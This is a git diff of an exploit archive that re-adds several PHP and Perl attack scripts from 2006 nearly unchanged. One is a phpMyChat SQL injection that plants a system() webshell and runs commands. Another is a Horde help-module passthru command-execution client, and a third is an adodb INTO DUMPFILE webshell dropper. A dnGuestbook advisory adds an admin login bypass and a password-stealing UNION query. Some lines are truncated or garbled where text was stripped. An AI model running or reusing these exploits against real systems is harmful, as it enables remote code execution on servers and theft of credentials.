-# http://prdownloads.sourceforge.net/phpmychat/phpMyChat-0.15.0-dev20050206.tgz?download
-#
-# code is no properly patched 'cause, if magic_quotes_gpc = Off, you can inject
-# an "always true" statement in PWD_Hash argument
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-
-
-$host=$argv[1];
-$path=$argv[2];
-$action=$argv[3];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-#step 1 -> Register, we need an online user
-srand(make_seed());
-$anumber = rand(1,99999);
-$data="FORM_SEND=1";
-$data.="&L=italian";
-$data.="&U=suntzu".$anumber;
-$data.="&pmc_password=suntzoi".$anumber;
-$data.="&FIRSTNAME=suntzu";
-$data.="&LASTNAME=suntzoi";
-$data.="&GENDER=1";
-$data.="&COUNTRY=";
-$data.="&WEBSITE=";
-$data.="&EMAIL=suntzu@suntzuuu.com";
-$data.="&SHOWEMAIL=0";
-$data.="&submit_type=Registrati";
-$packet ="POST ".$p."chat/register.php HTTP/1.0\r\n";
-$packet.="X-Forwarded-For: 127.0.0.1\r\n"; //spoof , a nice ip value for c_regusers table
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cookie: CookieLang=italian;\r\n\r\n";
-$packet.=$data;
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-
-#step 2 -> Login
-$packet ="GET ".$p."chat/loader.php?From=..%2FphpMyChat.php3&L=italian&Ver=H";
-$packet.="&U=suntzu".$anumber."&R=Default&T=1&D=10&N=20&ST=1&NT=1&PWD_Hash=".md5("suntzoi".$anumber)."&First=1 HTTP/1.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cookie: CookieLang=italian; CookieUsername=suntzu".$anumber."; CookieRoom=Default; CookieRoomType=1\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-
-#step 3 -> SQL Injection, let's store a shell in c_messages table
-$L="L=english";
-$U="U=SYS%20enter";
-$T ="0,"; //type
-$T.="CHAR(68,101,102,97,117,108,116),"; //room (Default)
-$T.="CHAR(83,89,83,32,101,110,116,101,114),"; //username (SYS enter)
-$T.="0,";//latin1
-$T.="9999999999,";//m_time
-$T.="1,";//address
-//message (our encoded shell -> system($_GET[cmd]);die ) ,if system() is disabled, reencode a new one with passthru() or exec()
-//u can use an unlimited number of chars for this
-$T.="CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*";
-$T="T=".urlencode($T);
-
-$PWD="'or'a'='a' UNION SELECT c_users.room, c_users.status, c_users.ip FROM c_users, c_reg_users WHERE 'a'='a' LIMIT 1/*";
-$PWD=urlencode($PWD);
-
-for ($i=0; $i<=1; $i++) //redo
-{
-srand(make_seed());
-$anumber = rand(1,99999);
-$R="R=Default".$anumber; //random, it must be different from the previous one
-$packet ="GET ".$p."chat/messagesL.php?$L&$U&$T&$R&PWD_Hash=$PWD HTTP/1.0\r\n";
-$packet.="X-Forwarded-For: suntzuuuuuuu\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-}
-sleep(1);
-#step 4 -> shell is passed to an eval(), so we launch commands
-$packet ="GET ".$p."chat/messagesL.php?L=english&R=Default&N=9999&T=0&U=SYS%20enter&cmd=".$cmd."&PWD_Hash=$PWD HTTP/1.0\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-echo $html;
-?>
-
-# milw0rm.com [2006-04-06]
+#!/usr/bin/php -q -d short_open_tag=on
+ works with magic_quotes_gpc=Off\r\n\r\n";
+echo "dork: intext:\"2000-2001 The phpHeaven Team\" -sourceforge\r\n\r\n";
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to PHPMyChat\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /phpmychat/ cat ./config/config.lib.php\r\n";
+echo "php ".$argv[0]." localhost /phpmychat/ ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
+die;
+}
+
+# explaination:
+#
+# only modified this one:
+#
+# http://retrogod.altervista.org/phpmychat_0145_xpl.html
+#
+# actually I tested this package:
+#
+# http://prdownloads.sourceforge.net/phpmychat/phpMyChat-0.15.0-dev20050206.tgz?download
+#
+# code is no properly patched 'cause, if magic_quotes_gpc = Off, you can inject
+# an "always true" statement in PWD_Hash argument
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+
+$host=$argv[1];
+$path=$argv[2];
+$action=$argv[3];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+#step 1 -> Register, we need an online user
+srand(make_seed());
+$anumber = rand(1,99999);
+$data="FORM_SEND=1";
+$data.="&L=italian";
+$data.="&U=suntzu".$anumber;
+$data.="&pmc_password=suntzoi".$anumber;
+$data.="&FIRSTNAME=suntzu";
+$data.="&LASTNAME=suntzoi";
+$data.="&GENDER=1";
+$data.="&COUNTRY=";
+$data.="&WEBSITE=";
+$data.="&EMAIL=suntzu@suntzuuu.com";
+$data.="&SHOWEMAIL=0";
+$data.="&submit_type=Registrati";
+$packet ="POST ".$p."chat/register.php HTTP/1.0\r\n";
+$packet.="X-Forwarded-For: 127.0.0.1\r\n"; //spoof , a nice ip value for c_regusers table
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cookie: CookieLang=italian;\r\n\r\n";
+$packet.=$data;
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+
+#step 2 -> Login
+$packet ="GET ".$p."chat/loader.php?From=..%2FphpMyChat.php3&L=italian&Ver=H";
+$packet.="&U=suntzu".$anumber."&R=Default&T=1&D=10&N=20&ST=1&NT=1&PWD_Hash=".md5("suntzoi".$anumber)."&First=1 HTTP/1.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cookie: CookieLang=italian; CookieUsername=suntzu".$anumber."; CookieRoom=Default; CookieRoomType=1\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+
+#step 3 -> SQL Injection, let's store a shell in c_messages table
+$L="L=english";
+$U="U=SYS%20enter";
+$T ="0,"; //type
+$T.="CHAR(68,101,102,97,117,108,116),"; //room (Default)
+$T.="CHAR(83,89,83,32,101,110,116,101,114),"; //username (SYS enter)
+$T.="0,";//latin1
+$T.="9999999999,";//m_time
+$T.="1,";//address
+//message (our encoded shell -> system($_GET[cmd]);die ) ,if system() is disabled, reencode a new one with passthru() or exec()
+//u can use an unlimited number of chars for this
+$T.="CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*";
+$T="T=".urlencode($T);
+
+$PWD="'or'a'='a' UNION SELECT c_users.room, c_users.status, c_users.ip FROM c_users, c_reg_users WHERE 'a'='a' LIMIT 1/*";
+$PWD=urlencode($PWD);
+
+for ($i=0; $i<=1; $i++) //redo
+{
+srand(make_seed());
+$anumber = rand(1,99999);
+$R="R=Default".$anumber; //random, it must be different from the previous one
+$packet ="GET ".$p."chat/messagesL.php?$L&$U&$T&$R&PWD_Hash=$PWD HTTP/1.0\r\n";
+$packet.="X-Forwarded-For: suntzuuuuuuu\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+}
+sleep(1);
+#step 4 -> shell is passed to an eval(), so we launch commands
+$packet ="GET ".$p."chat/messagesL.php?L=english&R=Default&N=9999&T=0&U=SYS%20enter&cmd=".$cmd."&PWD_Hash=$PWD HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+echo $html;
+?>
+
+# milw0rm.com [2006-04-06]
diff --git a/platforms/php/webapps/1650.pl b/platforms/php/webapps/1650.pl
index 1462cb094..ee7b1845a 100755
--- a/platforms/php/webapps/1650.pl
+++ b/platforms/php/webapps/1650.pl
@@ -1,130 +1,130 @@
-#!/usr/bin/perl 
-# Wed Apr  5 21:51:12 CEST 2006 jolascoaga@514.es
-#
-# Horde help module remote execution
-# 
-# telnet 310.27.901.33.1109 1689 # thanks horatio for the address
-# USER paranoia
-# PASS total
-# SYST
-# REST 100
-# REST 0
-# PWD
-# TYPE A
-# PASV
-# LIST
-# CWD 0days
-# GET horddy.pl
-#
-# w0w this damn 0day ftp is so sexy!
-# 
-# GO GO GO !! GO GO GO !! Team fall back!
-# 
-# Example: ./horddy.pl --host=http://www.server.com/horde
-# 
-# Now for your X-box !
-# 
-# Greets:
-#  - all 514 crew 
-#  - mallorca ppl r0xing.
-#
-# THIS IS PENE! TIMMY!!! LIVIN' A LIE!
-# 
- 
-
-use strict;
-use LWP::UserAgent;
-use LWP::Simple;
-use HTTP::Request;
-use HTTP::Response;
-use Getopt::Long;
-
-$| = 1;   # mess with the best? don't mess with my buffer
-
-my ($proxy,$proxy_user,$proxy_pass);
-my ($host,$debug,$dir, $command);
-my $use_ssl = 0;
-
-my $options = GetOptions (
-  'host=s'      => \$host, 
-  'dir=s'      => \$dir,
-  'proxy=s'           => \$proxy,
-  'proxy_user=s'      => \$proxy_user,
-  'proxy_pass=s'      => \$proxy_pass,
-  'debug'             => \$debug);
-
-&help unless ($host); # please don't try this at home.
-
-$dir = "/horde/" unless($dir);
-print "$host - $dir\n";
-
-while () {
-print "horddy> "; # lost connection
-while() {
-$command=$_;
-chomp($command);
-last;
-}
-&send($command);
-}
-
-sub buildcmd {# this is a useful comment
-my ($cmd) = @_;
-# wonderful hacking
-$cmd =~ s/ /\%20/gi;
-$cmd =~ s/\//\"\.chr\(47\)\.\"/gi;
-
-return $cmd;
-}
-
-sub send {
-    my ($tmp) = @_;
-    my $ok=0;
-    my $cmd = buildcmd ($tmp); # this is really magic ^^
-    my $socket;
-    LWP::Debug::level('+') if $debug; # but remember this is crap :D
-
-    my $ua = new LWP::UserAgent();   
-    $ua->agent("Nozilla/P.N (Just for IDS woring)"); # this is not me :/
-
-    my $string = "/$dir/services/help/?show=about&module=;\".passthru(\"$cmd\");'.";
-
-    if ($host !~ /^http/) {
-$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP
-    }
-
-    my $req = HTTP::Request->new (GET => $host.$string);
-    $ua->proxy(['http'] => $proxy) if $proxy;
-    $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
-
-    print $req->as_string() if $debug; 
-
-    my $res = $ua->request($req);
-    my $html = $res->content(); 
-
-    foreach (split(/\n/,$html)) {
-if ((/
    /)) { # brum brum conditionals desmitified
-last;
-}
-print "$_\n" if $ok eq "1"; # i don't think this is usefull 
-if (/ \$host, 
+  'dir=s'      => \$dir,
+  'proxy=s'           => \$proxy,
+  'proxy_user=s'      => \$proxy_user,
+  'proxy_pass=s'      => \$proxy_pass,
+  'debug'             => \$debug);
+
+&help unless ($host); # please don't try this at home.
+
+$dir = "/horde/" unless($dir);
+print "$host - $dir\n";
+
+while () {
+print "horddy> "; # lost connection
+while() {
+$command=$_;
+chomp($command);
+last;
+}
+&send($command);
+}
+
+sub buildcmd {# this is a useful comment
+my ($cmd) = @_;
+# wonderful hacking
+$cmd =~ s/ /\%20/gi;
+$cmd =~ s/\//\"\.chr\(47\)\.\"/gi;
+
+return $cmd;
+}
+
+sub send {
+    my ($tmp) = @_;
+    my $ok=0;
+    my $cmd = buildcmd ($tmp); # this is really magic ^^
+    my $socket;
+    LWP::Debug::level('+') if $debug; # but remember this is crap :D
+
+    my $ua = new LWP::UserAgent();   
+    $ua->agent("Nozilla/P.N (Just for IDS woring)"); # this is not me :/
+
+    my $string = "/$dir/services/help/?show=about&module=;\".passthru(\"$cmd\");'.";
+
+    if ($host !~ /^http/) {
+$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP
+    }
+
+    my $req = HTTP::Request->new (GET => $host.$string);
+    $ua->proxy(['http'] => $proxy) if $proxy;
+    $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
+
+    print $req->as_string() if $debug; 
+
+    my $res = $ua->request($req);
+    my $html = $res->content(); 
+
+    foreach (split(/\n/,$html)) {
+if ((/
    /)) { # brum brum conditionals desmitified
+last;
+}
+print "$_\n" if $ok eq "1"; # i don't think this is usefull 
+if (/ 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$action=$argv[3];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-#step 1->read DOCUMENT ROOT from phpinfo
-$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=phpinfo HTTP/1.0\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("DOCUMENT_ROOT ",$html);
-$temp2=explode(" ",$temp[1]);
-$fullpath=$temp2[0];
-$fullpath=trim($fullpath);
-echo "DOCUMENT ROOT ->".$fullpath."\r\n\r\n";
-$fullpath=str_replace("\\","\\\\\\\\",$fullpath); // win boxes
-if ($fullpath=="")
-{
-echo $html;
-die("\r\n\r\nCannot read phpinfo ...\r\n");
-}
-
-#step 2->execute a query (you can regardless of magic_quotes_gpc)
-$SQL ="SELECT '',0,0,0,0,0 ";
-$SQL.="INTO DUMPFILE '".$fullpath."/suntzu.php' FROM poc.poc_user_account LIMIT 1";
-$SQL=urlencode($SQL);
-$packet ="GET ".$p."include/adodb/server.php?sql=$SQL HTTP/1.0\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-if (strstr($html,"Access denied") || !strstr($html,"200 OK") || strstr($html,"Can't connect"))
-{
-echo $html;
-die("\r\n\r\nExploit failed...\r\n");
-}
-sleep(1);
-#step 3->launch commands
-$packet ="GET /suntzu.php?cmd=".$cmd." HTTP/1.0\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-if (!strstr($html,"*delim*"))
-{
-echo $html;
-die("\r\n\r\nExploit failed...\r\n");
-}
-else
-{
-echo "Exploit succeeded...\r\n";
-$temp=explode("*delim*",$html);
-echo $temp[1];
-}
-?>
-
-# milw0rm.com [2006-04-09]
+#!/usr/bin/php -q -d short_open_tag=on
+ 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$action=$argv[3];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+#step 1->read DOCUMENT ROOT from phpinfo
+$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=phpinfo HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("DOCUMENT_ROOT ",$html);
+$temp2=explode(" ",$temp[1]);
+$fullpath=$temp2[0];
+$fullpath=trim($fullpath);
+echo "DOCUMENT ROOT ->".$fullpath."\r\n\r\n";
+$fullpath=str_replace("\\","\\\\\\\\",$fullpath); // win boxes
+if ($fullpath=="")
+{
+echo $html;
+die("\r\n\r\nCannot read phpinfo ...\r\n");
+}
+
+#step 2->execute a query (you can regardless of magic_quotes_gpc)
+$SQL ="SELECT '',0,0,0,0,0 ";
+$SQL.="INTO DUMPFILE '".$fullpath."/suntzu.php' FROM poc.poc_user_account LIMIT 1";
+$SQL=urlencode($SQL);
+$packet ="GET ".$p."include/adodb/server.php?sql=$SQL HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (strstr($html,"Access denied") || !strstr($html,"200 OK") || strstr($html,"Can't connect"))
+{
+echo $html;
+die("\r\n\r\nExploit failed...\r\n");
+}
+sleep(1);
+#step 3->launch commands
+$packet ="GET /suntzu.php?cmd=".$cmd." HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (!strstr($html,"*delim*"))
+{
+echo $html;
+die("\r\n\r\nExploit failed...\r\n");
+}
+else
+{
+echo "Exploit succeeded...\r\n";
+$temp=explode("*delim*",$html);
+echo $temp[1];
+}
+?>
+
+# milw0rm.com [2006-04-09]
diff --git a/platforms/php/webapps/1653.txt b/platforms/php/webapps/1653.txt
index 00587d8eb..3912f071d 100755
--- a/platforms/php/webapps/1653.txt
+++ b/platforms/php/webapps/1653.txt
@@ -1,79 +1,79 @@
-#####################################################
-# \_______________________________________________/ #
-# |                                               | #
-# |                                               | #
-# |              SECURITY ADVISORY                | #
-# |                                               | #
-# |                                               | #
-# /¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\ #
-#####################################################
-
-
-
-     advisory: dnGuestbook <= v2.0 remote sql injection vulnerability
-      release: 2006-04-08
-       author: snatcher [snatcher at gmx.ch]
-      country: switzerland  |+| 
-      
-  application: dnGuestbook <= v2.0
-     download: http://www.designnation.de/
- app.descript: a php / mysql based guestbook script with an admin panel
-
-  description: because of the false implemented userinputs you can login as admin with a simpel sql injection.
-               afterward you can exploit a not validated GET variable to get admin's email and password.
-  fingerprint: google -> "dnGuestbook by design-nation.de Version" -> 331
-               msn -> "dnGuestbook by design-nation.de Version" -> 249
-   conditions: php.ini -> magic_quotes_gpc = Off
-       greets: all security guys and coders over the world, honkey :>, ..
-
-
-
----------- LOGIN AS ADMIN ----------
-
-admin.php - line 771, 772
-  $result = mysql_query ("SELECT * FROM dnguestbook_user WHERE mail='$mail' AND passwort='$passwort';");
-  $eingeloggt = mysql_num_rows($result);
-
-if magic_quotes_gpc is off, the ' won't be escaped and you can inject malicious sql code here.
-the script only verifies if a result is given back, and doesn't check, if the entered email and 
-password are the same like the email and password in the database.
-
-you gonna log in with following username (the password isn't necessary):
-
-E-Mail: ' OR 1 = 1 /*
-Passwort: b0000m
-
-the query would look like this:
-
-  SELECT * FROM dnguestbook_user WHERE mail='' OR 1 = 1 /* AND passwort='b0000m'
-
-the expression "/*" comments out the following part of the query.
-the query will match always, because the WHERE - clause with "OR 1 = 1" is always true.
-
-now you are logged in as admin. how will you get the admin password?
-
-
----------- GET ADMIN PASSWORD ----------
-
-in the adminpanel, you click the link "Beiträge". after that, you click the [e] right of a guestbook
-entry. it doesn't matter which entry you choose. normally, you can edit here some guestbok entries.
-the uri will look like this:
-
-  http://yourhost.com/path_to_gb/admin.php?gbgo=edit&id=8
-  
-two variables are transmitted over GET but only "id=8" is relevant for us.
-
-admin.php - line 678
-  $result = mysql_query ("SELECT * FROM dnguestbook_eintrag WHERE id=$id;");
-
-you see, that the variable "id" isn't validated. you can inject malicious sql code again.
-we make use of the UNION operator.
-
- http://yourhost.com/path_to_gb/admin.php?gbgo=edit&id=-999%20union%20select%200,passwort,0,mail,mail,mail,mail,0,0,passwort%20from%20dnguestbook_user
-
-the admin's email is shown in the field "*Ihre E-Mail:" and the admin's password in the field "*Ihr Text:" (plaintext !!)
-
-description of the UNION operator:
-  http://dev.mysql.com/doc/refman/5.0/en/union.html
-
-# milw0rm.com [2006-04-09]
+#####################################################
+# \_______________________________________________/ #
+# |                                               | #
+# |                                               | #
+# |              SECURITY ADVISORY                | #
+# |                                               | #
+# |                                               | #
+# /¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\ #
+#####################################################
+
+
+
+     advisory: dnGuestbook <= v2.0 remote sql injection vulnerability
+      release: 2006-04-08
+       author: snatcher [snatcher at gmx.ch]
+      country: switzerland  |+| 
+      
+  application: dnGuestbook <= v2.0
+     download: http://www.designnation.de/
+ app.descript: a php / mysql based guestbook script with an admin panel
+
